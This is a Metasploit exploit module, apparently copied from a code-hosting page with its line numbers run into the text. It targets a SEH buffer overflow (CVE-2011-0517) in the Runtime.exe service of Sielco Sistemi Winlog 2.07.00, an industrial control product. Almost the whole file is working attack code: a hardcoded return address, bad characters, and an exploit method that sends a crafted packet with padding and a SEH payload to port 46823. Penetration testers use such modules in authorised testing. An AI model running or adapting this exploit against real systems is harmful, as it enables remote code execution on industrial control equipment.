Path: blob/master/modules/exploits/windows/scada/winlog_runtime.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Sielco Sistemi Winlog Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in Sielco18Sistem Winlog <= 2.07.00. When sending a specially formatted19packet to the Runtime.exe service, an attacker may be able to20execute arbitrary code.21},22'Author' => [ 'Luigi Auriemma', 'MC' ],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2011-0517' ],26[ 'OSVDB', '70418'],27[ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],28[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02']29],30'Privileged' => false,31'DefaultOptions' => {32'EXITFUNC' => 'process',33'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',34},35'Payload' => {36'Space' => 450,37'BadChars' => "\x00\x20\x0a\x0d",38'StackAdjustment' => -3500,39},40'Platform' => 'win',41'Targets' => [42[ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2011-01-13',46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options([Opt::RPORT(46823)])55end5657def exploit58connect5960data = [0x02].pack('C') # opcode61data << [0x0101].pack('n')62data << rand_text_alpha_upper(588)63data << generate_seh_payload(target.ret)6465print_status("Trying target #{target.name}...")66sock.put(data)6768handler69disconnect70end71end727374